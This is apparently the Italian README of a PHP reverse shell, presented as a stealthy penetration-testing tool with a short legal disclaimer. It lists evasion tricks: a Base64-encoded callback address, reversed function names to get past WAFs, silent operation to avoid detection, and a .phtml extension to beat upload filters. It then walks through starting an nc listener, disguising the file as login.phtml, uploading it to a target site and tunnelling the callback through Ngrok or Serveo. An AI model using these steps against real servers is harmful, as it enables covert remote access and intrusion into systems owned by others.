
Questo è un potente e furtivo reverse shell PHP progettato per l'hacking etico e i test di penetrazione. Stabilisce una connessione affidabile e silenziosa verso la tua macchina.
Questa è una shell inversa PHP potente e furtiva progettata per hacking etico e test di penetrazione. Stabilisce una connessione affidabile e silenziosa verso la tua macchina.
Questa shell inversa PHP è sviluppata strettamente per scopi educativi e di test di penetrazione autorizzati.
Lo sviluppatore non è responsabile per qualsiasi uso improprio, danno o attività illegale eseguita utilizzando questa reverse_shell.
Usa responsabilmente e solo su sistemi di proprietà o per i quali hai esplicita autorizzazione a testare. L'accesso non autorizzato è illegale e punibile per legge.
L'IP e il comando shell sono codificati in Base64 per la furtività
I nomi delle funzioni sono invertiti per bypassare WAF e filtri di sicurezza
Modalità silenziosa — nessun output visualizzato per evitare il rilevamento
Si riconnette automaticamente se la connessione cade
Può funzionare come demone in background (se il server lo supporta)
Funziona sulla maggior parte dei server con PHP abilitato
Supporta servizi di tunneling come Ngrok, Serveo
Carica con estensione .phtml per bypassare alcuni filtri
1. Avvia un listener sulla tua macchina
nc -lvnp 4444
2. Codifica il tuo IP o hostname in Base64
Usa questo semplice comando:
echo "your_ip_or_hostname" | base64
Esempio:
echo "192.168.1.5" | base64
Copia l'output e sostituisci il valore $ip_b64 nello script della shell inversa PHP.
3. Aggiorna il tuo script della shell inversa PHP:
Modifica queste righe con il tuo IP/hostname codificato in Base64 e la porta:
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;
4. Rinomina il file e caricalo
Rinomina il file con qualcosa di meno sospetto, ad esempio:
login.phtml
avatar.phtml
update.phtml
Usare l'estensione .phtml aiuta il file a funzionare su alcuni server che bloccano .php.
Carica questo file sul sito web target dove sono consentiti i caricamenti.
5. Attiva la shell inversa
Apri il file caricato in un browser:
http://target.com/uploads/login.phtml
Una volta aperto, il tuo listener riceverà una connessione di shell inversa.
Se stai usando dati mobili o sei dietro a un router (NAT), il tuo IP potrebbe non essere pubblico. In tal caso, la shell inversa non può raggiungere direttamente la tua macchina.
Per risolvere, usa strumenti di tunneling TCP come Ngrok o Serveo.
Installa Ngrok
Esegui questo comando:
ngrok tcp 4444
Mostrerà qualcosa come:
Forwarding tcp://4.tcp.ngrok.io:18900
Aggiorna il tuo script della shell inversa PHP:
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;
Avvia il tuo listener:
nc -lvnp 4444
Esegui questo comando:
ssh -R 0:localhost:4444 serveo.net
Dirà qualcosa come:
Forwarding TCP connections from serveo.net:46603
Aggiorna il tuo script della shell inversa PHP:
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;
Avvia il tuo listener:
nc -lvnp 4444
Questo progetto è concesso in licenza sotto GNU General Public License v3.0